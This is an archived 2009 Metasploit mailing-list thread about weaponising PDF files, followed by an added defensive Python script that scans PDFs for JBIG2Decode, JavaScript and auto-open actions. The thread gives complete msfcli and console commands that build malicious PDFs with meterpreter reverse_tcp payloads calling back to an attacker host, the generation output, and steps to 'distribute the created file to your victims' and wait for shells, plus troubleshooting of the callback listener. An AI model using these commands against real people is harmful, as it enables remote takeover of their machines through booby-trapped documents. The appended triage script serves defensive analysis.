Metasploit mailing list archives
is it possible to attach metasploit payloads
From: abhishek.luck at gmail.com (Abhishek Kumar)
Date: Mon, 30 Mar 2009 05:41:40 +0000
hi list,

the suggested methods of injecting payloads in pdf files are application specific (adobe acrobat reader). can we have a generic pdf which is loaded with msf payloads and waiting for the user action ??

abhi

On Sun, Mar 29, 2009 at 9:06 PM, <framework-request at spool.metasploit.com> wrote:
> Message: 1
> Date: Sun, 29 Mar 2009 20:14:05 +0000
> From: wfdawson at bellsouth.net
> Subject: Re: [framework] is it possible to attach metasploit payloads withpdf
> To: framework at spool.metasploit.com
>
> Hi, I tried your suggestion. I have a NAT'ed connection to the Internet where connections to my external address are mapped one-to-one to my internal address. With the following:
>
> ./msfcli exploit/windows/fileformat/adobe_jbig2decode filename=test2.pdf payload=windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 E
>
> ...where x.x.x.x is my actual Internet visible IP address, I obtained the following response:
>
> [*] Please wait while we load the module tree...
> [*] Handler binding to LHOST 0.0.0.0
> [-] Bind failed on 0.0.0.0
> [*] Handler binding to LHOST x.x.x.x
> [-] Bind failed on x.x.x.x
> [-] Exploit failed: Cannot assign requested address - bind(2)
>
> Is there a way to make this work in my situation?
>
> -------------- Original message from Mirko Iodice <m.iodice at gmail.com>: --------------
> > try:
> >
> > ./msfcli exploit/windows/fileformat/adobe_utilprintf filename=document.pdf payload=windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=5555 E
> >
> > 2009/3/28 Abhishek Kumar :
> > > hi list,
> > > yesterday i was working around attaching a meterpreter reverse_tcp payload to a MS word document. It was simple to do because msfpayload provides payloads in VBA format. Now,the question is... is there anything available for pdf files ? can we embed our payloads with pdf and then wait for the user to click on it ??
> > >
> > > regards
> > > abhi
> >
> > --
> > Mirko Iodice
>
> ------------------------------
>
> Message: 2
> Date: Sun, 29 Mar 2009 21:46:03 +0100
> From: Anastasios Monachos <anastasiosm at gmail.com>
> Subject: Re: [framework] is it possible to attach metasploit payloads withpdf
> To: framework at spool.metasploit.com
>
> Have tested the following with Adobe Acrobat Reader 9.0.0
>
> tasos at hostnet:~/Programs/framework-3.2$ ./msfcli exploit/windows/fileformat/adobe_jbig2decode FILENAME=jbig2decode.1.102-5555.pdf PAYLOAD=windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=5555 E
> [*] Please wait while we load the module tree...
> [*] Handler binding to LHOST 0.0.0.0
> [*] Started reverse handler
> [*] Creating 'document102-5555.pdf' file...
> [*] Generated output file /home/r0b/Programs/framework-3.2/data/exploits/document102-5555.pdf
>
> 1. Have ready the multi/handler running with windows/meterpreter/reverse_tcp, with LHOST attacker_ip and LPORT 5555
> 2. Distribute the created file to your victims
> 3. and wait for shells to launch
>
> ----or----
>
> msf > use windows/fileformat/adobe_jbig2decode
> msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
> msf exploit(adobe_jbig2decode) > set LHOST attacker_ip
> msf exploit(adobe_jbig2decode) > set LPORT 5555
> LPORT => 5555
> msf exploit(adobe_jbig2decode) > exploit
> [*] Handler binding to LHOST 0.0.0.0
> [*] Started reverse handler
> [*] Creating 'msf.pdf' file...
> [*] Generated output file /home/tasos/Programs/framework-3.2/data/exploits/msf.pdf
> [*] Exploit completed, but no session was created.
>
> now follow 1,2,3 as before
>
> Regarding the error received by fdawson at bellsouth.net :
>
> ....
> [-] Bind failed on x.x.x.x
> [-] Exploit failed: Cannot assign requested address - bind(2)
>
> Check if you have enough permissions on your system, also check if the LPORT is already bound.
>
> 2009/3/28 Nicolas Krassas <krasn at ans.gr>
> > Trying this one i couldn't really make it to succeed. Anybody has positive results on this ?
> >
> > Dinos
> >
> > ----- Original Message -----
> > From: "rogue" <wullie19 at ntlworld.com>
> > To: <framework at spool.metasploit.com>
> > Cc: "Abhishek Kumar" <abhishek.luck at gmail.com>
> > Sent: Saturday, March 28, 2009 12:39 PM
> > Subject: Re: [framework] is it possible to attach metasploit payloads withpdf
> >
> > > Theres also the new one adobe_jbig2decode.rb.
> > >
> > > -rogue
>
> --
> AM
>
> ------------------------------
>
> Message: 3
> Date: Sun, 29 Mar 2009 15:53:25 -0500
> From: Natron <natron at invisibledenizen.org>
> Subject: Re: [framework] is it possible to attach metasploit payloads withpdf
> To: "wfdawson at bellsouth.net" <wfdawson at bellsouth.net>
> Cc: "framework at spool.metasploit.com" <framework at spool.metasploit.com>
>
> Are you running it as root? You can't bind to 443 on a 'normal' account.
>
> N
>
> ------------------------------
>
> Message: 4
> Date: Sun, 29 Mar 2009 21:05:39 +0000
> From: wfdawson at bellsouth.net
> Subject: Re: [framework] is it possible to attach metasploit payloads withpdf
> To: "framework at spool.metasploit.com" <framework at spool.metasploit.com>
>
> Yes, I am running it as root. The "problem" would appear to be that my call to msfcli cannot bind to the x.x.x.x address as that is not my interface's actual address. My address is y.y.y.y which is NAT'ed to x.x.x.x. I should not care about that from my side. The client can certainly connect to x.x.x.x which then is connected to me by NAT...
>
> ------------------------------
>
> End of Framework Digest, Vol 14, Issue 35
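Defender-side companion to the thread, added here as an example and not part of any list member's message or of Metasploit: a triage pass over a received PDF for the document features the two modules named above rely on (the JBIG2Decode stream filter and document JavaScript), with PDF name escapes (#xx) normalized before matching. The SUSPICIOUS table, the function names and the sample bytes are constructed for illustration.

```python
import re
import sys
from collections import Counter

# PDF names worth a second look in a file from an untrusted sender.
SUSPICIOUS = {
    "JBIG2Decode": "JBIG2 stream filter",
    "JS": "JavaScript action body",
    "JavaScript": "JavaScript action or name tree",
    "OpenAction": "action run when the document is opened",
    "AA": "additional (automatic) actions",
    "ObjStm": "object stream; names compressed inside it are not seen here",
}

# A name is '/' plus regular characters; '#xx' inside it is a hex escape.
NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")

def normalize_name(raw: bytes) -> str:
    """Undo #xx escapes so 'JBIG#32Decode' compares equal to 'JBIG2Decode'."""
    return HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")

def triage_pdf(data: bytes) -> dict:
    """Count flagged names; 'obfuscated' counts those spelled with #xx escapes."""
    hits = Counter()
    for match in NAME_RE.finditer(data):
        raw = match.group(1)
        name = normalize_name(raw)
        if name in SUSPICIOUS:
            hits[name] += 1
            if b"#" in raw:
                hits["obfuscated"] += 1
    return dict(hits)

# Constructed sample (not a working document, carries no exploit content).
SAMPLE = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>\nendobj\n"
    b"4 0 obj\n<< /S /JavaScript /JS (var x = 1;) >>\nendobj\n"
    b"5 0 obj\n<< /Length 0 /Filter /JBIG#32Decode >>\nstream\n\nendstream\nendobj\n"
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for name, count in sorted(triage_pdf(data).items()):
        print(f"{count:3d}  {name:<12} {SUSPICIOUS.get(name, 'flagged names spelled with #xx escapes')}")
```

A hit is a reason to open the file in an isolated analysis environment or with a full PDF parser, not a verdict; a raw byte scan also matches names that happen to appear inside strings and stream data.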
Current thread:
- is it possible to attach metasploit payloads Abhishek Kumar (Mar 29)
- is it possible to attach metasploit payloads Anastasios Monachos (Mar 30)